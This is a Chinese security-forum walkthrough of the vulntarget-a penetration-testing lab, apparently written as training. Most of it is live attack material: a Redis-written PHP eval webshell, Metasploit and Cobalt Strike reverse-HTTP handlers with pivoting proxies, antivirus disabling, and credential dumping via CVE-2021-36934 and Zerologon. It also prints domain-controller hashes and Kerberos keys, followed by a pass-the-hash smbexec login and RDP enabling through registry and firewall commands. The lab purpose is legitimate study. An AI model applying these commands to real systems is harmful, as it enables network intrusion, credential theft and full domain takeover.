安全矩阵

 找回密码
 立即注册
搜索
查看: 2398|回复: 0

vulntarget-a

[复制链接]

63

主题

125

帖子

457

积分

中级会员

Rank: 3Rank: 3

积分
457
发表于 2021-11-29 20:17:16 | 显示全部楼层 |阅读模式

vulntarget-a攻击机:
kali:192.168.0.124
win:19.128.0.193

靶机
第一层:VMnet18 win2016 win7(192.168.0.188)
第二层 :VNnet19 win2016 win2019

配置一下ip,这里外网机ip192.168.127.91实际为192.168.0.188
打开
通达oa 一键getshell


传个cs载荷上去


这里因为第二层设计的是redis,cs转为msf上线
msf
use exploit/multi/handlerset payload windows/meterpreter/reverse_http(跟cs上选用的payload一样)set lhost 192.168.0.124//本机ipset lport 7777/接受的端口exploit //执行

然后cs那边创建一个foreign监听的listeners。
Listeners的ip为msf的ip,端口为msf监听的端口(注:如果msf是内网下的,则需要把端口映射到公网,或者使用ngrok等工具做流量转发)
然后,回到cs上,选中拿下的计算机会话,右键选中spawn,然后在弹出来的框中


ok
添加路由,并设置msf代理转发,arp获取到内网同网段IP
在添加路由之后,需要设置代理,对内网的机器进行扫描和漏洞探测。
use auxiliary/server/socks在这里一共有两个大模块,一个是auxiliary/server/socks_proxy,包含socks4a和socks5,auxiliary/server/socks_unc,包含socks_unc,据说有时候socks5的代理不是很稳定。

meterpreter > bg
  • Backgrounding session 1...msf6 exploit(multi/handler) > use auxiliary/server/socks_proxy msf6 auxiliary(server/socks_proxy) >  use post/multi/manage/autoroute//添加路由msf6 post(multi/manage/autoroute) > set session 1session => 1msf6 post(multi/manage/autoroute) > run​[!] SESSION may not be compatible with this module.
  • Running module against WIN7-PC
  • Searching for subnets to autoroute.[+] Route added to subnet 10.0.0.0/255.255.0.0 from host's routing table.[+] Route added to subnet 192.168.0.0/255.255.255.0 from host's routing table.
  • Post module execution completedmsf6 post(multi/manage/autoroute) > use auxiliary/server/socks_proxy//使用socks5代理msf6 auxiliary(server/socks_proxy) > optinos[-] Unknown command: optinos.msf6 auxiliary(server/socks_proxy) > options​Module options (auxiliary/server/socks_proxy):​   Name      Current Setting  Required  Description​----      ---------------  --------  -----------​   PASSWORD                   no        Proxy password for SOCKS5 listener   SRVHOST   0.0.0.0          yes       The address to listen on   SRVPORT   1080             yes       The port to listen on   USERNAME                   no        Proxy username for SOCKS5 listener   VERSION   5                yes       The SOCKS version to use (Accepted: 4a, 5)​​Auxiliary action:​   Name   Description​----   -----------​   Proxy  Run a SOCKS proxy server​​msf6 auxiliary(server/socks_proxy) > run
  • Auxiliary module running as background job 0.msf6 auxiliary(server/socks_proxy) >
  • Starting the SOCKS proxy server​msf6 auxiliary(server/socks_proxy) > sessions -i 1
  • Starting interaction with 1...​meterpreter > arp a​ARP cache=========​    IP address       MAC address        Interface    ----------       -----------        ---------    10.0.20.99       00:0c:29:49:db:32  13    10.0.255.255     ff:ff:ff:ff:ff:ff  13    192.168.0.1      b8:3a:08:4b:16:a0  11    192.168.0.124    00:0c:29:99:4d:88  11    192.168.0.193    3c:6a:a7:aa:36:f6  11    192.168.0.255    ff:ff:ff:ff:ff:ff  11    224.0.0.22       00:00:00:00:00:00  1    224.0.0.22       01:00:5e:00:00:16  11    224.0.0.22       01:00:5e:00:00:16  13    224.0.0.252      01:00:5e:00:00:fc  11    224.0.0.252      01:00:5e:00:00:fc  13    239.255.255.250  00:00:00:00:00:00  1    255.255.255.255  ff:ff:ff:ff:ff:ff  11​meterpreter > 10.0.20.99就是win2016的redis服务
    proxy全局代理一下




    bg出去看下有没有任务执行


    辣鸡msf丢包了(后面发现是虚拟机自动休眠= =)
    后来发先这个0.0.0.0 1080的意思是0.0.0.0是msf的ip来进行代理 也就是本机ip
    然后proxy的写法是 socks5 192.168.0.124 1080
    不是socks 12.168.0.124:1080 这是很早之前的版本
    再来一遍 ok
    roxychains redis-cli -h 10.0.20.99

    redis未授权漏洞写webshell
    config set dir "C:/phpStudy/PHPTutorial/WWW/"config set dbfilename tx.phpset 1 "<?php @eval($_POST['tx']);?>"save

    蚁剑代理连接


    无语试了好几次- -= =
    记得保存代理!!!!!!!!!!!!!!
    卡了我好久 = =

    cs转发上线新建中转监听-转发生成beacon.exe-上传-执行
    好家伙 又遇到了和之前做weblogic一样的转发问题
    总共感觉是因为我第一层网络配置在内网的原因
    把所有的靶机关下防火墙试试
    还是不行,算了,打ack123,把那个会了 估计这两个就会了
    学完了ack123
    再来看看
    看下改下ip把各个网段ping通和改dns试试


    好了先把上面那些操作再执行一遍????
    成功上线


    这里有个关键,是要把这个机器自带的mic杀毒关掉
    不过这一般不能cmd关掉,可以Negro带内网出网开3389再用注册表或者组策略(百度一大堆)关掉
    也可以直接关掉”实时监控病毒“
    当然直接shellcode用cool平台免杀过

    接下来把密码dump一下


    aad3b435b51404eeaad3b435b51404ee
    探测一下存活主机






    10.0.10.110 而且还有域
    shell setspn -T vulntarget.com -q /
    为啥没扫出来
    看着好像是这个win2019没在域内
    CVE-2021-36934读取一下密码


    转msf
    探测主域和域控
    此时来探测下主域
    定位域控
    run post/windows/gather/enum_domain得到域控IP:10.0.10.110
    账号:WIN-UKFQSV1OMUB
    域:balsec.com
    再次添加路由:
    直接使用CVE-2020-1472(域控提权)


    还是不行,绝对是他域没配置好的原因
    配置一下,提权后
    使用impactet来进行下一步的操作
    获取域控hash,cd到example下:
    开个ew代理配合proxy

    proxychains4 python3 secretsdump.py balsec.com/WIN-UKFQSV1OMUB\$@10.0.10.110 -no-passB$:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::WIN-CHSI558JDRS$:1103:aad3b435b51404eeaad3b435b51404ee:e66191ef715d73ff91be074777d3ed02:::
  • Kerberos keys grabbedAdministrator:aes256-cts-hmac-sha1-96:ecb89a4e91cccc9c7fc032d25baacac6d86068c030f617185a52854eb796c920Administrator:aes128-cts-hmac-sha1-96:d3b5696e566bca57ffdfd57576068c63Administrator:des-cbc-md5:322a836da886d39dkrbtgt:aes256-cts-hmac-sha1-96:4d1befebb0d088a69c01f5a4045b3ce78b061d61c273cc7e5f38ca54eec9538dkrbtgt:aes128-cts-hmac-sha1-96:4117fc904715b252b8bed058315068b1krbtgt:des-cbc-md5:7a45ad015d2cba86WIN-UKFQSV1OMUB$:aes256-cts-hmac-sha1-96:f03227a5a0d4203943c8e63070692aafbf93f475afc4310dba3350bd4736d59aWIN-UKFQSV1OMUB$:aes128-cts-hmac-sha1-96:f0f2c8151d89eff91e9d76f412ca54d1WIN-UKFQSV1OMUB$:des-cbc-md5:f4f8193dc80b4ce0WIN-CHSI558JDRS$:aes256-cts-hmac-sha1-96:ef70a9041487fef2f7fa4dd91724545ed5286d70242495370b92393de45cb971WIN-CHSI558JDRS$:aes128-cts-hmac-sha1-96:2157ac92157cde35268a54568a834333WIN-CHSI558JDRS$:des-cbc-md5:ef8a9449a2b64c37
  • Cleaning up...
    proxychains4 python3 secretsdump.py balsec.com/WIN-UKFQSV1OMUB\$@10.0.10.110 -no-passB$:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::WIN-CHSI558JDRS$:1103:aad3b435b51404eeaad3b435b51404ee:e66191ef715d73ff91be074777d3ed02:::
  • Kerberos keys grabbedAdministrator:aes256-cts-hmac-sha1-96:ecb89a4e91cccc9c7fc032d25baacac6d86068c030f617185a52854eb796c920Administrator:aes128-cts-hmac-sha1-96:d3b5696e566bca57ffdfd57576068c63Administrator:des-cbc-md5:322a836da886d39dkrbtgt:aes256-cts-hmac-sha1-96:4d1befebb0d088a69c01f5a4045b3ce78b061d61c273cc7e5f38ca54eec9538dkrbtgt:aes128-cts-hmac-sha1-96:4117fc904715b252b8bed058315068b1krbtgt:des-cbc-md5:7a45ad015d2cba86WIN-UKFQSV1OMUB$:aes256-cts-hmac-sha1-96:f03227a5a0d4203943c8e63070692aafbf93f475afc4310dba3350bd4736d59aWIN-UKFQSV1OMUB$:aes128-cts-hmac-sha1-96:f0f2c8151d89eff91e9d76f412ca54d1WIN-UKFQSV1OMUB$:des-cbc-md5:f4f8193dc80b4ce0WIN-CHSI558JDRS$:aes256-cts-hmac-sha1-96:ef70a9041487fef2f7fa4dd91724545ed5286d70242495370b92393de45cb971WIN-CHSI558JDRS$:aes128-cts-hmac-sha1-96:2157ac92157cde35268a54568a834333WIN-CHSI558JDRS$:des-cbc-md5:ef8a9449a2b64c37
  • Cleaning up...
    得到administrator的hash
    aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15直接就拿下域控
    proxychains4 python3 smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:c7c654da3开个3389远程登录
    开启远程桌面
    reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v portnumber /d 3389 /fwmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow直接3389登录:proxychains4 rdesktop 10.0.10.110
    账号:balsec.com\administrator 密码:Admin@666





  • 回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    小黑屋|安全矩阵

    GMT+8, 2024-11-27 23:54 , Processed in 0.015945 second(s), 18 queries .

    Powered by Discuz! X4.0

    Copyright © 2001-2020, Tencent Cloud.

    快速回复 返回顶部 返回列表